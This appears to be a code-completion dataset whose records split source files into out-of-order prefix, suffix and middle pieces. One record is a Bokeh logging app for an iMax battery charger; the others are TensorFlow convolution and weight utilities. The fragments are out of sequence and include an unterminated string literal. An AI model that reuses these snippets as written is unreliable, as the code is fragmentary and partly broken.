'cycles':cycles,
'device_started':device_started,
'time_interval':time_interval,
'start_cycle':start_cycle,
'run_text':run_text,
'run_status':run_status,
'final_out':final_read,
'data_out_packet':data_out_packet, | #Create the header for page
notice1 = Div(text="""The data input here are for logging identification and saving conditions, which are already manually chosen
on the imax. They do not set or reset the imax.""",
sizing_mode = "scale_width")
select_battype = Select(title = "Battery Type", value ="", options = ['NiMH', 'NiCd', 'LiPO', 'LiFe', 'LiIO', 'LiHV'])
def select_battype_handler(attr, old, new):
settings['bat_type'] = new
select_battype.on_change('value', select_battype_handler)
select_chrg_type = Select(title="Charge Type", value="Charge", options=["Charge", "Discharge", "Cycle", "Re-Peak", "AutoCharge", "Balance Charge", "Fast Charge", "Storage"])
def select_chrg_type_handler(attr, old, new):
settings['chrg_type'] = new
select_chrg_type.on_change('value', select_chrg_type_handler)
maxmah_slider = Slider(start=50, end=24000, value=1, step=50, title="Bat. Specified Capacity, mah")
def maxmah_handler(attr, old, new):
settings['nominal_mah'] = new
maxmah_slider.on_change('value', maxmah_handler)
DC_radio_group = RadioGroup(labels=["Discharge/Charge", "Charge/Discharge"], active=0)
def DC_radio_handler(new):
settings['DC'] = new
DC_radio_group.on_click(DC_radio_handler)
select_cells = Select(title = "No. of Cells", value ="4", options = [str(i) for i in range(1,13)])
def select_cells_handler(attr, old, new):
settings['cells'] = new
select_cells.on_change('value', select_cells_handler)
#imax discharge/charge # of cycles; imax limit is 5
#no way to read this from imax only shows up in set up packet
select_cycles = Select(title = "Cycles", value ="1", options = [str(i) for i in range(1,6)])
def select_cycles_handler(attr, old, new):
settings['cycles'] = new
select_cycles.on_change('value', select_cycles_handler)
text_input = TextInput(value="Enter run information", title="Run Info::")
def text_input_handler(attr, old, new):
settings['run_text'] = new
text_input.on_change("value", text_input_handler)
textsource = ColumnDataSource(data=dict(time = [],msg = []))
columns = [
TableColumn(field="time", title="Time"),
TableColumn(field="msg", title="Msg", width = 600)]
data_table = DataTable(source=textsource, columns=columns, width=600)
button_save = Button(label="Save Run", button_type = 'warning')
def button_save_handler():
global read_data
print('button save worked')
run_modes= {'bat_type':settings['bat_type'], 'chrg_type':settings['chrg_type'], 'nominal_mah':settings['nominal_mah'],
'DC_or_CD':settings['DC_or_CD'], 'cycles':settings['cycles'], 'cells':settings['cells'], 'run_text':settings['run_text']}
excel_out = imax_0.write_excel_file(run_modes, settings['final_read'], read_data, settings['settings_dict'])
msg = 'Data saved to: ' + excel_out
print(msg)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_save.on_click(button_save_handler)
def text_update(t, msg):
global data_table
print('time and msg: ', t, msg)
new_data = dict(time=[t], msg=[msg],)
textsource.stream(new_data, 20) #adding the value is a scrolloff lines
data_table.update()
import imax_0
def check_device_status():
global device_dict
#used by startstop btn handler to determine if imax start btn was pressed, or imax running.
#global device_dict
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
device = device_dict['device']
#send host->imax packet to trigger imax to do imax->host transfer
#make sure device is still connected
if device:
w_out = device.write(EndPt_out, settings['data_out_packet'])
data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize)
settings['run_status'] = int(str(data[4]))
return settings['run_status']
else:
print('Check device failed.')
return None
def get_final_data():
global device_dict
device = device_dict['device']
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
final_out = [0x0f, 0x03, 0xfe, 0x000, 0xfe, 0xff, 0xff] + [0]*57
w_out = device.write(EndPt_out, final_out)
final_data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize)
if final_data:
final_mah = str(final_data[5] * 256 + final_data[6]) #energy
final_t = str(final_data[7] * 256 + final_data[8]) #timer sec
final_V = str((final_data[9] * 256 + final_data[10]) / 1000.0) #voltage, V
final_T = str(final_data[14]) #Temperature, deg C, if F???
#int temp
settings['final_read'] = {'final_mah':final_mah, 'final_t':final_t, 'final_V':final_V, 'final_T':final_T}
msg = 'Run completed. Final values: ' + final_mah + ' mah; '+ final_V + ' mV; ' + final_t + ' s.'
print(msg)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
def start_device():
global read_data
global device_dict
#sets up device if connected, returns imax settings, configrs, and sets data dictionary.
#check for device, if not there wait for connection.
device_str = imax_0.find_my_device() #returns True if device found
if "No" in device_str:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), device_str)
print(device_str)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax offline. Cycling for one minute.')
nowtime = datetime.datetime.now()
futuretime = datetime.datetime.now() + datetime.timedelta(minutes = 1)
while "No" in device_str:
device_str = imax_0.find_my_device() #returns msg which has "No" in it ,if device not found
if "No" in device_str:
if datetime.datetime.now()> futuretime:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Could not find device; check device and connection.')
return False
time.sleep(1)
print('device found')
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), device_str)
#device was found, engage device, get parameters and dictionaries
device_dict, read_data, settings_dict, data_out_packet = imax_0.start_imax()
print('Loading settings)
settings['settings_dict'] = settings_dict
settings['data_out_packet'] = data_out_packet
#Determine if device is idling, or already running: run_status = 2 or 3, or is running = 1
settings['run_status'] = check_device_status()
nowtime = datetime.datetime.now()
futuretime = datetime.datetime.now() + datetime.timedelta(minutes = 1)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Waiting for Imax button press for one minute.')
while settings['run_status'] > 1:
settings['run_status'] = check_device_status()
if datetime.datetime.now()> futuretime:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax button not pressed in 1 min...aborting start.')
return False
time.sleep(1)
print('out of loop run_status is: ', settings['run_status'])
return True
def add_lines(plot, source, cells_num = 0):
#called from button_startstop_handler if bat_type LiPO, note cells must be > 1
color_list = ['orange', 'yellow', 'green', 'blue', 'violet', 'darkmagenta']
if cells_num > 1:
for i in range(cells_num):
p1.line(x = 'timer', y = 'cell'+ str(i+1), source = source, color = color_list[i], line_width = 2)
button_startstop = Button(label = "Start", button_type = 'success')
def button_startstop_handler():
global button_startstop
#read btn label and isas driver for condition
#label = "Start": and device_started = False is initial start up condition
if button_startstop.label == "Start":
button_startstop.label = "Connecting"
settings['device_started'] = start_device()
#returns True if device found,connected and started
if settings['device_started']:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax found & running.')
button_startstop.label = "Stop"
settings['start_cycle'] = curdoc().add_periodic_callback(update, 10000)
print('device found')
else:
if not settings['device_started']:
button_startstop.label = "Start"
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax start failed. Check everything')
else: #deal with stop conditions; user pressed app stop button, or run_status > 1 (imax buttons pressed.)
if button_startstop.label == "Stop":
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Run stopped.')
curdoc().remove_periodic_callback(settings['start_cycle'])
get_final_data()
button_startstop.label = "Start"
if "Li" in settings['bat_type']:
add_lines(p1, source, cells_num = int(settings['cells']))
button_startstop.on_click(button_startstop_handler)
def read_imax():
global read_data
global device_dict
# see above call to start_imax() for globals set from imax.py
#global data_out_packet
global out_data
#global run_status
device = device_dict['device']
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
#send the host->imax packet to trigger imax to fill buffer and do imax->host transfer
#make sure device is still connected
w_out = device.write(EndPt_out, settings['data_out_packet'])
try:
data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize) #using more general form of Endpoint_IN attributes
except Exception as e:
print('Something went wrong: no data incoming; error is: ', e)
sys.exit()
#Parse the hex data
out_data['mah'] = [int(str(data[5]*256 + data[6]))] #capacity, mah
out_data['timer'] = [int(str(data[7]*256 + data[8]))] #seconds
out_data['volts'] = [int(str(data[9]*256 + data[10]))] #volts
out_data['current'] = [int(str(data[11]*256 + data[12]))] #amps
out_data['ext_T'] = [int(str(data[13]))]
out_data['internal_T'] = [int(str(data[14]))] #deg. C?
out_data['cell1'] = [int(str(data[17]*256 + data[18]))] #cell 1 etc.
out_data['cell2'] = [int(str(data[19]*256 + data[20]))]
out_data['cell3'] = [int(str(data[21]*256 + data[22]))]
out_data['cell4'] = [int(str(data[23]*256 + data[24]))]
out_data['cell5'] = [int(str(data[25]*256 + data[26]))]
out_data['cell6'] = [int(str(data[27]*256 + data[28]))]
read_data['mah'].append(int(str(data[5]*256 + data[6]))) #capacity, mah
read_data['timer'].append(int(str(data[7]*256 + data[8]))) #seconds
read_data['volts'].append(int(str(data[9]*256 + data[10]))) #volts
read_data['current'].append(int(str(data[11]*256 + data[12]))) #amps
read_data['ext_T'].append(int(str(data[13])))
read_data['internal_T'].append(int(str(data[14]))) #deg. C?
read_data['cell1'].append(int(str(data[17]*256 + data[18])))
read_data['cell2'].append(int(str(data[19]*256 + data[20])))
read_data['cell3'].append(int(str(data[21]*256 + data[22])))
read_data['cell4'].append(int(str(data[23]*256 + data[24])))
read_data['cell5'].append(int(str(data[25]*256 + data[26])))
read_data['cell6'].append(int(str(data[27]*256 + data[28])))
#print the data (same sequence Milek7 used with hidapi; much appreciated effort.
print(
str(data[4]) + ", " + #state
str(data[5] * 256 + data[6]) + ", " + #energy
str(data[7] * 256 + data[8]) + ", " + #timer
str((data[9] * 256 + data[10]) / 1000.0) + ", " + #voltage
str((data[11] * 256 + data[12]) / 1000.0) + ", " + #current
str(data[13]) + ", " + #ext temp
str(data[14]) + ", " + #int temp
str((data[17] * 256 + data[18]) / 1000.0) + ", " + #cell 1
str((data[19] * 256 + data[20]) / 1000.0) + ", " + #cels 2
str((data[21] * 256 + data[22]) / 1000.0) + ", " + #cell 3
str((data[23] * 256 + data[24]) / 1000.0) + ", " + #cell 4
str((data[25] * 256 + data[26]) / 1000.0) + ", " + #cell 5
str((data[27] * 256 + data[28]) / 1000.0) #cell 6
)
#Has the charger been stopped by pressing the charger Stop button?
settings['run_status'] = int(str(data[4]))
return settings['run_status'], out_data
#initialize read_data dictionary for plots
out_data = {'mah':[0], 'timer':[0], 'volts':[0], 'current':[0],
'ext_T':[0], 'internal_T':[0], 'cell1':[0], 'cell2':[0],
'cell3':[0],'cell4':[0], 'cell5':[0], 'cell6':[0]}
#time_interval = 5 #seconds
source = ColumnDataSource(data = out_data)
#Generate two plots, for capacity and voltage
p = figure(plot_width=400, plot_height=400)
p.title.text = "Capactiy Input vs. Charge Time"
p.title.text_color = "black"
p.title.text_font = "arial"
p.title.text_font_style = "bold"
p.yaxis.minor_tick_line_color = "black"
p.xaxis.axis_label = "Time, s"
p.yaxis.axis_label = "Capacity Added(mah)"
r_cap = p.line(x = 'timer', y = 'mah', source = source, color="red", line_width=2)
#Set the voltabe plot; complicated a bit by battery type
p1 = figure(plot_width=400, plot_height=400)
p1.title.text = "Voltage vs. Charge Time"
p1.title.text_color = "black"
p1.title.text_font = "arial"
p1.title.text_font_style = "bold"
p1.yaxis.minor_tick_line_color = "black"
p1.xaxis.axis_label = "Time, s"
p1.yaxis.axis_label = "Voltage. mV"
rx = p1.line(x = 'timer', y = 'volts', source = source, color = "firebrick", line_width=2)
"""
#test block for adding lines
if "Li" in bat_type:
r1 = p1.line(x ='timer', y = 'cell1', source = source, color="orange", line_width=2)
r2 = p1.line(x ='timer', y = 'cell2', source = source, color="yellow", line_width=2)
r3 = p1.line(x ='timer', y = 'cell3', source = source, color="green", line_width=2)
r4 = p1.line(x ='timer', y = 'cell4', source = source, color="blue", line_width=2)
r5 = p1.line(x ='timer', y = 'cell5', source = source, color="violet", line_width=2)
r6 = p1.line(x ='timer', y = 'cell6', source = source, color="darkmagenta", line_width=2)
"""
def update():
global out_data
global source
global device_dict
device = device_dict['device']
if device:
#note "new_data" is bokeh specific to only add to source
settings['run_status'], new_data = read_imax()
#print('read_imax returned run status: ', settings['run_status'])
if settings['run_status'] < 2 and button_startstop.label == "Stop":
source.stream(new_data) # 20)
else:
msg = '; User stopped run from imax stop button.'
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_startstop_handler()
else:
msg = '; Device no longer connected.'
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_startstop_handler()
"""
class Cycler(update()):
msg = "Message from Cycler"
start_cycle = staticmethod(curdoc().add_periodic_callback(update, 10000))
stop_cycle = staticmethod(curdoc().remove_periodic_callback(start_cycle))
# create the widgets
"""
#start_cycle = curdoc().add_periodic_callback(update, 10000) #time in milliseconds
#w1 = row(select_battype, select_chrg_type) #, width = 300) #sizing_mode = 'fixed')
w1 = widgetbox(select_battype, select_chrg_type, select_cells) #, width = 300) #sizing_mode = 'fixed')
w2 = widgetbox(maxmah_slider) #, sizing_mode='fixed')
w3 = widgetbox(text_input) #, sizing_mode = 'fixed')
w4 = widgetbox(button_startstop, button_save )#, sizing_mode ='fixed')
w5 = widgetbox(DC_radio_group, select_cycles)
w6 = widgetbox(data_table)
"""
Layit = layout([row(column(
[notice1],
[w1],
[w2],
[w3],
[w4],
[w5],
[data_table]),
column(p, p1))], sizing_mode='fixed')
"""
#Layit = gridplot([[column([p, p1]), widgetbox(w1.children+w2.children+w3.children+w4.children+w5.children)]])
curdoc().add_root(notice1)
Layit = gridplot([[widgetbox(w1.children+w2.children+w3.children+w4.children+w5.children,), column([p, p1])]])
curdoc().add_root(Layit)
curdoc().add_root(data_table)
#curdoc().add_root(p)
#curdoc().add_root(p1)
#interval is not constant,
#based on derivative of capacity
# Add a periodic callback to be run every 500 milliseconds
#curdoc().add_periodic_callback(update, 500)
#for running textarea update following is one way to do it with js
"""
textare udating w/ jquery and textarea
var txt = document.getElementById('log');
setInterval(function(){txt.value += '\ntest';},2000);
<textarea id='log' rows=50 cols=60 autofocus></textarea>
""" | 'settings_dict':settings_dict,
'device_dict':device_dict
}
| random_line_split |
network.py | ## Collection of utils for building networks
import numpy as np
import tensorflow as tf
from tensorflow.contrib import layers
from atflow import constraints
def conv2d_output_shape(input_shape, filter_shape, stride, padding):
"""
Computes the shape of the output tensor from conv2d operation with the given configuration
:param input_shape: shape of the input tensor, must be a list, numpy array or TensorShape
:param filter_shape: shape of the convolution filter.
:param stride: stride for the convolution
:param padding: padding mode, either 'VALID' or 'SAME'
:return: shape of the output tensor as a plain list of integers
"""
filter_shape = tf.TensorShape(filter_shape).as_list()
filter_out = filter_shape[-1]
filter_patch_shape = np.array(filter_shape[0:2])
input_shape_list = tf.TensorShape(input_shape).as_list()
batch = input_shape_list[:-3]
input_shape = np.array(input_shape_list[-3:])
stride = np.array(stride)
if padding == 'VALID':
shift = -filter_patch_shape + 1
elif padding == 'SAME':
shift = 0
else:
raise ValueError('padding must be either "VALID" or "SAME", but "%s" was given' % padding)
output_shape = np.ceil((input_shape[:2] + shift) / stride[1:3])
return batch + output_shape.astype(np.int).tolist() + [filter_out]
def conv2d_config(input_shape, output_shape, filter_shape):
"""
Based on the desired input, output and filter shape, figure out the correct 2D convolution configuration to use
including the type (normal or full convolution), stride size, padding type/size
:param input_shape:
:param output_shape:
:param filter_shape:
:return:
"""
input_shape = tf.TensorShape(input_shape).as_list()
if len(input_shape) == 4:
batch_size = input_shape[0]
else:
batch_size = None
input_shape = np.array(input_shape[-3:])
output_shape = np.array(tf.TensorShape(output_shape).as_list()[-3:])
# Determine what kind of convolution to use
if np.all(input_shape[-3:-1] >= output_shape[-3:-1]):
conv_type = "NORMAL"
elif np.all(input_shape[-3:-1] <= output_shape[-3:-1]):
conv_type = 'FULL'
# swap input and output shape
input_shape, output_shape = output_shape, input_shape
else:
raise ValueError('Input shape dimensions must be both bigger than or both smaller than output shape dimensions')
filter_shape = np.array(tf.TensorShape(filter_shape).as_list()[:2] + [input_shape[-1], output_shape[-1]])
stride = np.ceil((input_shape[:2] - filter_shape[:2] + 1) / output_shape[:2]).astype(np.int)
padding = output_shape[:2] * stride - input_shape[:2] + filter_shape[:2] - 1
# Determine what type of padding can be used
if np.all(np.ceil(input_shape[:2] / stride) == output_shape[:2]):
padding_type = 'SAME'
else:
padding_type = 'VALID'
# get padded input shape
input_shape[:2] = input_shape[:2] + padding.astype(np.int)
padded_shape = [batch_size] + input_shape.tolist()
left_padding = np.ceil(padding / 2).astype(np.int)
right_padding = np.floor(padding / 2).astype(np.int)
padding = [[0, 0], [left_padding[0], right_padding[0]], [left_padding[1], right_padding[1]], [0, 0]]
stride = [1, stride[0], stride[1], 1]
return filter_shape.tolist(), stride, padding, padded_shape, conv_type, padding_type
def get_convolution_op(input_shape, output_shape, kernel_shape):
"""
Given the desired shapes of the input, output and filter tensors, returns the shape of the appropriate
convolution filter and a correctly configured op function. The returned op function should be called with the
input tensor and weight tensor, and returns a result of 2D convolution that matches the desired output_shape
:param input_shape: desired input shape into the convolution operation
:param output_shape: desired output shape from the convolution operation
:param kernel_shape: desired convolution kernel shape. Only the first two diemensions (height and width) will be used.
:return: (filter_shape, conv_op) The shape of the appropriate convolution filter/weight to be used (filter_shape) and
a function that can be invoked with inputs tensor and correctly sized filter tensor to define the convolution operation.
"""
filter_shape, strides, padding, padded_shape, conv_type, padding_type = conv2d_config(input_shape, output_shape, kernel_shape)
if conv_type == 'NORMAL':
|
else:
def conv_op(inputs, weight, name='generic_convolution'):
if padding_type=='SAME':
padded_output = [padded_shape[0]] + output_shape[-3:]
else:
padded_output = padded_shape
with tf.name_scope(name):
if padded_output[0] is None:
batch_size = tf.shape(inputs)[0]
padded_output = [batch_size] + padded_output[1:]
output = tf.nn.conv2d_transpose(inputs, weight, padded_output, strides, padding_type, name='transpose_convolution')
if padding_type=='VALID' and np.sum(padding) > 0:
output = tf.slice(output, [0, padding[1][0], padding[2][0], 0],
[-1] + output_shape[-3:], name='cropping')
return output
return filter_shape, conv_op
def normalize_weights(w, dims=(0,), bias=1e-5):
"""
L2 normalize weights of the given tensor along specified dimension(s).
Args:
w: Tensor to be normalized
dims: dimension(s) along which to normalize the Tensor. Defaults to (0,)
bias: Bias value added to the computed norm to prevent dividing by 0. Defaults to 1e-5
Returns: Tensor of same type and shape as `w` whose norm is set to approximately 1 along the specificed dimensions
"""
with tf.name_scope('normalization'):
return w / (tf.sqrt(tf.reduce_sum(tf.square(w), dims, keep_dims=True) + bias))
def weight_variable(shape, name='weight', mean=0.0, stddev=None, initializer=None, constrain=None, dtype=tf.float32):
"""
Creates and returns a variable initialized with random_normal_initializer, suitable for use as a weight.
In the current variable scope, creates (if necessary) and returns a named variable with `tf.random_normal_initializer`.
Args:
shape: Required. Shape of the variable
name: Optional. Name of the variable. Defaults to 'weight'
mean: Optional. Mean of the `random_normal_initializer`. Defaults to 0.0
stddev: Optional. Standard deviation of the `random_normal_initializer`. Defaults to 1e-3
dtype: Optional. Data type of the variable. Default to `tf.float32`.
Returns: Weight variable with specified name and shape with random normal initialization.
"""
if stddev is None:
raise ValueError('stddev not specified!')
if initializer is None:
initializer = tf.random_normal_initializer(mean=mean, stddev=stddev)
weights = tf.get_variable(name, shape=shape, initializer=initializer, dtype=dtype)
if constrain is not None:
constrain(weights)
return weights
def bias_variable(shape, name='bias', value=0.0, initializer=None, constrain=None, dtype=tf.float32):
"""
Creates and returns a variable initialized with random_normal_initializer, suitable for use as a bias.
In the current variable scope, creates (if necessary) and returns a named variable with `tf.random_normal_initializer`.
Args:
shape: Required. Shape of the variable
name: Optional. Name of the variable. Defaults to 'bias'
value: Optional. Constant value to which the variable is initialized. Defaults to 0.0
dtype: Optional. Data type of the variable. Default to `tf.float32`.
Returns: Bias variable with specified name and shape initialized to a constant.
"""
if initializer is None:
initializer = tf.constant_initializer(value=value)
biases = tf.get_variable(name, shape=shape, initializer=initializer, dtype=dtype)
if constrain is not None:
constrain(biases)
return biases
def factorized_readout(inputs, n_outputs=100, constrain=True):
width, height, n_features = inputs.get_shape()[1:].as_list()
n_pixels = width * height
with tf.variable_scope('readout'):
# spatial readout
w_spatial = weight_variable([n_pixels, 1, n_outputs], name='weight_spatial')
if constrain:
constraints.positive_constrain(w_spatial)
w_spatial_norm = normalize_weights(w_spatial, dims=(0,))
# feature readout
w_feature = weight_variable([1, n_features, n_outputs], name='weight_feature')
if constrain:
constraints.positive_constrain(w_feature)
w_feature_norm = normalize_weights(w_feature, dims=(1,))
# scaling
w_scale = bias_variable([n_outputs], name='weight_scale', value=1.0)
if constrain:
constraints.positive_constrain(w_scale)
# total readout weight
w_out = tf.reshape(w_spatial_norm * w_feature_norm * w_scale, [n_pixels * n_features, n_outputs],
'weight_readout')
output = tf.matmul(tf.reshape(inputs, [-1, n_pixels * n_features]), w_out)
return output, w_spatial_norm, w_feature_norm, w_scale, w_out
def batch_norm(inputs, *args, tag=None, add_summary=True, step=0, **kwargs):
if step > 0 and 'updates_collections' not in kwargs:
kwargs['updates_collections'] = 'dump'
output = layers.batch_norm(inputs, *args, **kwargs)
if add_summary:
if tag is None:
tag = inputs.op.name.split('/')[-1]
tag = 'batch_norm/' + tag
tf.histogram_summary(tag, inputs)
tf.histogram_summary(tag + '_bn', output)
return output | def conv_op(inputs, weight, name='generic_convolution'):
with tf.name_scope(name):
if padding_type=='VALID' and np.sum(padding) > 0:
inputs = tf.pad(inputs, padding, name='padding')
return tf.nn.conv2d(inputs, weight, strides, padding_type, name='convolution') | conditional_block |
network.py | ## Collection of utils for building networks
import numpy as np
import tensorflow as tf
from tensorflow.contrib import layers
from atflow import constraints
def conv2d_output_shape(input_shape, filter_shape, stride, padding):
"""
Computes the shape of the output tensor from conv2d operation with the given configuration
:param input_shape: shape of the input tensor, must be a list, numpy array or TensorShape
:param filter_shape: shape of the convolution filter.
:param stride: stride for the convolution
:param padding: padding mode, either 'VALID' or 'SAME'
:return: shape of the output tensor as a plain list of integers
"""
filter_shape = tf.TensorShape(filter_shape).as_list()
filter_out = filter_shape[-1]
filter_patch_shape = np.array(filter_shape[0:2])
input_shape_list = tf.TensorShape(input_shape).as_list()
batch = input_shape_list[:-3]
input_shape = np.array(input_shape_list[-3:])
stride = np.array(stride)
if padding == 'VALID':
shift = -filter_patch_shape + 1
elif padding == 'SAME':
shift = 0
else:
raise ValueError('padding must be either "VALID" or "SAME", but "%s" was given' % padding)
output_shape = np.ceil((input_shape[:2] + shift) / stride[1:3])
return batch + output_shape.astype(np.int).tolist() + [filter_out]
def | (input_shape, output_shape, filter_shape):
"""
Based on the desired input, output and filter shape, figure out the correct 2D convolution configuration to use
including the type (normal or full convolution), stride size, padding type/size
:param input_shape:
:param output_shape:
:param filter_shape:
:return:
"""
input_shape = tf.TensorShape(input_shape).as_list()
if len(input_shape) == 4:
batch_size = input_shape[0]
else:
batch_size = None
input_shape = np.array(input_shape[-3:])
output_shape = np.array(tf.TensorShape(output_shape).as_list()[-3:])
# Determine what kind of convolution to use
if np.all(input_shape[-3:-1] >= output_shape[-3:-1]):
conv_type = "NORMAL"
elif np.all(input_shape[-3:-1] <= output_shape[-3:-1]):
conv_type = 'FULL'
# swap input and output shape
input_shape, output_shape = output_shape, input_shape
else:
raise ValueError('Input shape dimensions must be both bigger than or both smaller than output shape dimensions')
filter_shape = np.array(tf.TensorShape(filter_shape).as_list()[:2] + [input_shape[-1], output_shape[-1]])
stride = np.ceil((input_shape[:2] - filter_shape[:2] + 1) / output_shape[:2]).astype(np.int)
padding = output_shape[:2] * stride - input_shape[:2] + filter_shape[:2] - 1
# Determine what type of padding can be used
if np.all(np.ceil(input_shape[:2] / stride) == output_shape[:2]):
padding_type = 'SAME'
else:
padding_type = 'VALID'
# get padded input shape
input_shape[:2] = input_shape[:2] + padding.astype(np.int)
padded_shape = [batch_size] + input_shape.tolist()
left_padding = np.ceil(padding / 2).astype(np.int)
right_padding = np.floor(padding / 2).astype(np.int)
padding = [[0, 0], [left_padding[0], right_padding[0]], [left_padding[1], right_padding[1]], [0, 0]]
stride = [1, stride[0], stride[1], 1]
return filter_shape.tolist(), stride, padding, padded_shape, conv_type, padding_type
def get_convolution_op(input_shape, output_shape, kernel_shape):
"""
Given the desired shapes of the input, output and filter tensors, returns the shape of the appropriate
convolution filter and a correctly configured op function. The returned op function should be called with the
input tensor and weight tensor, and returns a result of 2D convolution that matches the desired output_shape
:param input_shape: desired input shape into the convolution operation
:param output_shape: desired output shape from the convolution operation
:param kernel_shape: desired convolution kernel shape. Only the first two diemensions (height and width) will be used.
:return: (filter_shape, conv_op) The shape of the appropriate convolution filter/weight to be used (filter_shape) and
a function that can be invoked with inputs tensor and correctly sized filter tensor to define the convolution operation.
"""
filter_shape, strides, padding, padded_shape, conv_type, padding_type = conv2d_config(input_shape, output_shape, kernel_shape)
if conv_type == 'NORMAL':
def conv_op(inputs, weight, name='generic_convolution'):
with tf.name_scope(name):
if padding_type=='VALID' and np.sum(padding) > 0:
inputs = tf.pad(inputs, padding, name='padding')
return tf.nn.conv2d(inputs, weight, strides, padding_type, name='convolution')
else:
def conv_op(inputs, weight, name='generic_convolution'):
if padding_type=='SAME':
padded_output = [padded_shape[0]] + output_shape[-3:]
else:
padded_output = padded_shape
with tf.name_scope(name):
if padded_output[0] is None:
batch_size = tf.shape(inputs)[0]
padded_output = [batch_size] + padded_output[1:]
output = tf.nn.conv2d_transpose(inputs, weight, padded_output, strides, padding_type, name='transpose_convolution')
if padding_type=='VALID' and np.sum(padding) > 0:
output = tf.slice(output, [0, padding[1][0], padding[2][0], 0],
[-1] + output_shape[-3:], name='cropping')
return output
return filter_shape, conv_op
def normalize_weights(w, dims=(0,), bias=1e-5):
"""
L2 normalize weights of the given tensor along specified dimension(s).
Args:
w: Tensor to be normalized
dims: dimension(s) along which to normalize the Tensor. Defaults to (0,)
bias: Bias value added to the computed norm to prevent dividing by 0. Defaults to 1e-5
Returns: Tensor of same type and shape as `w` whose norm is set to approximately 1 along the specificed dimensions
"""
with tf.name_scope('normalization'):
return w / (tf.sqrt(tf.reduce_sum(tf.square(w), dims, keep_dims=True) + bias))
def weight_variable(shape, name='weight', mean=0.0, stddev=None, initializer=None, constrain=None, dtype=tf.float32):
"""
Creates and returns a variable initialized with random_normal_initializer, suitable for use as a weight.
In the current variable scope, creates (if necessary) and returns a named variable with `tf.random_normal_initializer`.
Args:
shape: Required. Shape of the variable
name: Optional. Name of the variable. Defaults to 'weight'
mean: Optional. Mean of the `random_normal_initializer`. Defaults to 0.0
stddev: Optional. Standard deviation of the `random_normal_initializer`. Defaults to 1e-3
dtype: Optional. Data type of the variable. Default to `tf.float32`.
Returns: Weight variable with specified name and shape with random normal initialization.
"""
if stddev is None:
raise ValueError('stddev not specified!')
if initializer is None:
initializer = tf.random_normal_initializer(mean=mean, stddev=stddev)
weights = tf.get_variable(name, shape=shape, initializer=initializer, dtype=dtype)
if constrain is not None:
constrain(weights)
return weights
def bias_variable(shape, name='bias', value=0.0, initializer=None, constrain=None, dtype=tf.float32):
"""
Creates and returns a variable initialized with random_normal_initializer, suitable for use as a bias.
In the current variable scope, creates (if necessary) and returns a named variable with `tf.random_normal_initializer`.
Args:
shape: Required. Shape of the variable
name: Optional. Name of the variable. Defaults to 'bias'
value: Optional. Constant value to which the variable is initialized. Defaults to 0.0
dtype: Optional. Data type of the variable. Default to `tf.float32`.
Returns: Bias variable with specified name and shape initialized to a constant.
"""
if initializer is None:
initializer = tf.constant_initializer(value=value)
biases = tf.get_variable(name, shape=shape, initializer=initializer, dtype=dtype)
if constrain is not None:
constrain(biases)
return biases
def factorized_readout(inputs, n_outputs=100, constrain=True):
width, height, n_features = inputs.get_shape()[1:].as_list()
n_pixels = width * height
with tf.variable_scope('readout'):
# spatial readout
w_spatial = weight_variable([n_pixels, 1, n_outputs], name='weight_spatial')
if constrain:
constraints.positive_constrain(w_spatial)
w_spatial_norm = normalize_weights(w_spatial, dims=(0,))
# feature readout
w_feature = weight_variable([1, n_features, n_outputs], name='weight_feature')
if constrain:
constraints.positive_constrain(w_feature)
w_feature_norm = normalize_weights(w_feature, dims=(1,))
# scaling
w_scale = bias_variable([n_outputs], name='weight_scale', value=1.0)
if constrain:
constraints.positive_constrain(w_scale)
# total readout weight
w_out = tf.reshape(w_spatial_norm * w_feature_norm * w_scale, [n_pixels * n_features, n_outputs],
'weight_readout')
output = tf.matmul(tf.reshape(inputs, [-1, n_pixels * n_features]), w_out)
return output, w_spatial_norm, w_feature_norm, w_scale, w_out
def batch_norm(inputs, *args, tag=None, add_summary=True, step=0, **kwargs):
if step > 0 and 'updates_collections' not in kwargs:
kwargs['updates_collections'] = 'dump'
output = layers.batch_norm(inputs, *args, **kwargs)
if add_summary:
if tag is None:
tag = inputs.op.name.split('/')[-1]
tag = 'batch_norm/' + tag
tf.histogram_summary(tag, inputs)
tf.histogram_summary(tag + '_bn', output)
return output | conv2d_config | identifier_name |
network.py | ## Collection of utils for building networks
import numpy as np
import tensorflow as tf
from tensorflow.contrib import layers
from atflow import constraints
def conv2d_output_shape(input_shape, filter_shape, stride, padding):
"""
Computes the shape of the output tensor from conv2d operation with the given configuration
:param input_shape: shape of the input tensor, must be a list, numpy array or TensorShape
:param filter_shape: shape of the convolution filter.
:param stride: stride for the convolution
:param padding: padding mode, either 'VALID' or 'SAME'
:return: shape of the output tensor as a plain list of integers
"""
filter_shape = tf.TensorShape(filter_shape).as_list()
filter_out = filter_shape[-1]
filter_patch_shape = np.array(filter_shape[0:2])
input_shape_list = tf.TensorShape(input_shape).as_list()
batch = input_shape_list[:-3]
input_shape = np.array(input_shape_list[-3:])
stride = np.array(stride)
if padding == 'VALID':
shift = -filter_patch_shape + 1
elif padding == 'SAME':
shift = 0
else:
raise ValueError('padding must be either "VALID" or "SAME", but "%s" was given' % padding)
output_shape = np.ceil((input_shape[:2] + shift) / stride[1:3])
return batch + output_shape.astype(np.int).tolist() + [filter_out]
